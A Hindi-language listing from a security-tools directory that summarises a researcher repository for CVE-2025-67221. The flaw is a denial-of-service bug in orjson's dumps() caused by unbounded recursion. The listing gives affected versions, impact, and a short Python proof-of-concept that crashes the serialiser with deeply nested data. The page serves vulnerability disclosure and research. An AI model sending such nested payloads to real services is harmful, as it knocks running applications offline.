Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-67221 — CVE-2025-67221 के लिए दस्तावेज़ीकरण और पुनरुत्पादन कोड, जो orjson के dumps() फ़ंक्शन में एक denial-of-service भेद्यता है, जो गहराई से नेस्टेड JSON डेटा को सीरियलाइज़ करते समय अनियंत्रित रिकर्सन के कारण होती है। | Kitploit
उपकरण/GitHubGitHub/kpatsakis/cve-2025-67221
भेद्यता विश्लेषणकोड विश्लेषणपेपर और शोधलर्निंग और शिक्षा
GitHubkpatsakis/cve-2025-67221

CVE-2025-67221

CVE-2025-67221 के लिए दस्तावेज़ीकरण और पुनरुत्पादन कोड, जो orjson के dumps() फ़ंक्शन में एक denial-of-service भेद्यता है, जो गहराई से नेस्टेड JSON डेटा को सीरियलाइज़ करते समय अनियंत्रित रिकर्सन के कारण होती है।

रिपॉजिटरी देखें
1127 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-67221

भेद्यता सारांश

फ़ील्डमान
CVE IDCVE-2025-67221
प्रभावित उत्पादorjson
प्रभावित संस्करण≤ 3.11.4
भेद्यता प्रकारसेवा से वंचित करना (अनियंत्रित पुनरावर्तन)
हमला वेक्टरदूरस्थ (यदि हमलावर क्रमबद्ध डेटा को नियंत्रित करता है)

विवरण

orjson संस्करण 3.11.4 और उससे पहले के संस्करणों में orjson.dumps() फ़ंक्शन में एक सेवा-से-वंचित (denial-of-service) भेद्यता मौजूद है। गहराई से नेस्टेड JSON डेटा संरचनाओं को क्रमबद्ध (serialize) करते समय यह फ़ंक्शन पुनरावर्तन सीमा (recursion limit) लागू नहीं करता है। कोई हमलावर जो किसी एप्लिकेशन से हमलावर-नियंत्रित नेस्टेड डेटा को क्रमबद्ध करवा सकता है, क्रमबद्धकरण (serialization) रूटीन में क्रैश ट्रिगर कर सकता है।

प्रभावित फ़ंक्शन

  • फ़ंक्शन: orjson.dumps()
  • फ़ाइल: pysrc/orjson/__init__.pyi

परीक्षण

परीक्षण किया गया:

  • Python 3.12.3/3.11.2/3.12.3/3.13.9/3.14.0 पर Ubuntu Linux kernel 6.8.0-88
  • Python 3.13.3 Microsoft Windows 11 Education 10.0.26200 Build 26200

प्रभाव

जो एप्लिकेशन अविश्वसनीय या हमलावर-नियंत्रित डेटा संरचनाओं को क्रमबद्ध करने के लिए orjson का उपयोग करते हैं, वे सेवा से वंचित करने वाले हमलों के प्रति संवेदनशील हो सकते हैं।

पुनरुत्पादन कोड

भेद्यता को स्थानीय रूप से दोहराने के लिए कोड:

root@kitploit:~
import orjson
import sys
import platform
print(f'OS: {platform.platform()}') 
print(f'Python version: {sys. version}') 
print(f'orjson version: {orjson.__version__}')
nested = []
for i in range(100):
    nested = [{"level": i, "next": nested}]
dumped = orjson.dumps(nested)

##डेमो

उपरोक्त कोड एक अच्छे core dump की ओर ले जाता है डेमो

लेखक / शोधकर्ता

  • Constantinos Patsakis, सूचना विज्ञान विभाग, पीरियस विश्वविद्यालय, ग्रीस
  • Evgenios Gkritsis, सूचना विज्ञान विभाग, एथेंस यूनिवर्सिटी ऑफ इकोनॉमिक्स एंड बिजनेस, ग्रीस
  • George Stergiopoulos, सूचना विज्ञान विभाग, एथेंस यूनिवर्सिटी ऑफ इकोनॉमिक्स एंड बिजनेस, ग्रीस

संदर्भ

  • https://github.com/ijl/orjson (प्रभावित प्रोजेक्ट)
टूल डाउनलोड करें